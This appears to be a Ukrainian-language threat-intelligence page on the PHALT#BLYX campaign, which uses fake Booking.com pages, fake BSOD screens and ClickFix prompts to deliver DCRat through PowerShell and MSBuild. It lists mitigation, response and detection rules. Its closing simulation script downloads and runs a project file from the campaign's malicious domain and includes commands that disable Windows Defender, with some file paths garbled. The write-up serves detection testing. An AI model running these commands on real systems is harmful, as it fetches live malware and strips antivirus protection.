Аналіз PHALT#BLYX: Фальшиві BSOD та надійні інструменти збірки в ланцюгах шкідливих програм
Detection stack
- AIDR
- Alert
- ETL
- Query
Резюме
Звіт деталізує багатоступеневий ланцюг вторгнення, що впливає на сектор гостинності, поєднуючи підроблену сторінку Booking.com, оманливу анімацію в стилі синього екрану та підказку у стилі ClickFix для тих, щоб переконати користувачів виконати PowerShell dropper. Цей dropper отримує файл проекту MSBuild, який запускає спеціальний завантажувач DCRat. Завантажувач змінює налаштування Windows Defender, встановлює стійкість за допомогою ярлика Startup .url і інжектує своє навантаження в легітимні процеси. Використовуючи інструменти, що містяться у системі, такі як PowerShell і MSBuild.exe, операції зменшують очевидні сліди шкідливого програмного забезпечення. Артефакти російської мови в ланцюзі також відзначені як натяк на авторів.
Розслідування
Дослідники Securonix відстежили потік від фішинг-електронних листів, які пропонують посилання на «скасування бронювання» на шкідливий домен, потім на однорядкову команду PowerShell, яка знаходить msbuild.exe, завантажує файл v.proj і виконує його. Проект v.proj виконує декілька дій: додає виключення для Windows Defender, завантажує staxs.exe (варіант DCRat), створює вказівний ярлик Startup .url для стійкості та підключається до інфраструктури командування та контролю через порт 3535. Завантажувач потім стискає та інжектує фінальну стадію в aspnet_compiler.exe, використовуючи метод hollowing для потоку нормальної діяльності.
Пом’якшення наслідків
Зменшіть вплив, навчаючи користувачів розпізнавати підказки у стилі ClickFix та соціальну інженерію «запустіть цю команду для виправлення». Моніторте та обмежуйте виконання MSBuild.exe, особливо коли виконується з незвичних шляхів або користувацьких робочих процесів, і увімкніть журналювання блоків скриптів PowerShell для кращої видимості. Додайте виявлення для створення ярликів .url в папці Startup та для змін у виключеннях Windows Defender. На мережевому рівні заблокуйте вихідний трафік на визначені шкідливі домени та явно обмежте або попереджайте про підозрілі виходи на TCP/3535, де це не потрібно.
Відповідь
Якщо активність виявлена, ізолюйте хост і збережіть ключові артефакти, включаючи v.proj, staxs.exe та будь-які файли Startup .url. Видаліть неавторизовані виключення Defender, припиніть шкідливі чи інжектовані процеси та заблокуйте пов’язані домени/IP C2 — особливо будь-яке спілкування через порт 3535. Скиньте потенційно скомпрометовані облікові дані, виконайте повне сканування на наявність шкідливих програм та перевірте середовище на аналогічні схеми виконання через MSBuild та команди PowerShell. Нарешті, розгорніть виявлення, інформовані загрозами, що зосереджені на зловживанні MSBuild, поведінці ClickFix та стійкості через ярлики Startup для запобігання рецидивам.
Потік атаки
Виявлення
Завантаження або Передача через Powershell (через командний рядок)
Переглянути
Підозрілі зміни налаштувань Windows Defender (через powershell)
Переглянути
Можливі точки стійкості [ASEPs – Реєстр програмного забезпечення/NTUSER Hive] (через подію реєстру)
Переглянути
Підозрілі бінарні/скрипти у локації автозапуску (через подію файлу)
Переглянути
IOC (HashSha512) для виявлення: Аналіз PHALT#BLYX: Як фейкові BSOD та довірені інструменти зборки використовуються для створення зараження шкідливим ПЗ
Переглянути
IOC (SourceIP) для виявлення: Аналіз PHALT#BLYX: Як фейкові BSOD та довірені інструменти зборки використовуються для створення зараження шкідливим ПЗ
Переглянути
IOC (HashSha256) для виявлення: Аналіз PHALT#BLYX: Як фейкові BSOD та довірені інструменти зборки використовуються для створення зараження шкідливим ПЗ
Переглянути
IOC (DestinationIP) для виявлення: Аналіз PHALT#BLYX: Як фейкові BSOD та довірені інструменти зборки використовуються для створення зараження шкідливим ПЗ
Переглянути
PHALT#BLYX Виконання зловмисного ПЗ через MSBuild та Hollowing процесів [Створення процесу Windows]
Переглянути
PHALT#BLYX Кампанія шкідливого ПЗ за допомогою PowerShell та MSBuild для зараження [Powershell Windows]
Переглянути
Імітаційне виконання
Передумова: Перевірка телеметрії та базової лінії повинна бути успішною.
Обґрунтування: Цей розділ деталізує точне виконання техніки противника (TTP), призначене для тригера правил виявлення. Команди і наратив прямо відображують ідентифіковані TTP і мають на меті генерувати точну телеметрію, очікувану логікою виявлення.
-
Опис атаки та команди:
Актор загрози відкриває сесію PowerShell на зараженій кінцевій точці. Спочатку знаходятьmsbuild.exe, потім завантажують зловмисний проект MSBuild (v.proj) доC:ProgramData. Зловмисник негайно викликаєmsbuild.exeдля виконання навантаження, яке скидає другий етап. Нарешті, вони змінюють налаштування Windows Defender, додаючи виключення і відключаючи моніторинг у реальному часі для забезпечення стійкості. -
Скрипт регресійного тестування:
# Скрипт симуляції PHALT#BLYX – відтворює активність, яка викликає тригер виявлення # -------------------------------------------------------------- # 1. Знаходження msbuild.exe $msb = (Get-ChildItem -Path C: -Filter msbuild.exe -Recurse -ErrorAction SilentlyContinue | Select-Object -First 1).FullName # 2. Завантаження зловмисного проекту MSBuild до ProgramData $projUrl = "https://2fa-bns.com/v.proj" $dest = "$env:ProgramDatav.proj" Invoke-WebRequest -Uri $projUrl -OutFile $dest # 3. Виконання проекту з msbuild.exe & $msb $dest # 4. Зміна налаштувань Windows Defender (будь-яка з нижчезазначених буде задовольняти правило) # Розкоментуйте потрібні рядки для симуляції дій зловмисника. # Додати шлях до виключення # Add-MpPreference -ExclusionPath "$env:ProgramData" # Додати виключення для .exe файлів # Add-MpPreference -ExclusionExtension ".exe" # Додати виключення для .ps1 файлів # Add-MpPreference -ExclusionExtension ".ps1" # Вимкнути моніторинг у реальному часі # Set-MpPreference -DisableRealtimeMonitoring $true -
Команди прибирання:
# Видалити завантажений файл проекту Remove-Item -Path "$env:ProgramDatav.proj" -Force -ErrorAction SilentlyContinue # Відновити моніторинг у реальному часі Windows Defender (якщо він був вимкнений) Set-MpPreference -DisableRealtimeMonitoring $false # Видалити будь-які додані виключення (приклад для виключення шляхів) Remove-MpPreference -ExclusionPath "$env:ProgramData" # За бажанням видалити всі залишкові файли, створені навантаженням # Remove-Item -Path "C:ProgramDatamalicious_payload.exe" -Force -ErrorAction SilentlyContinue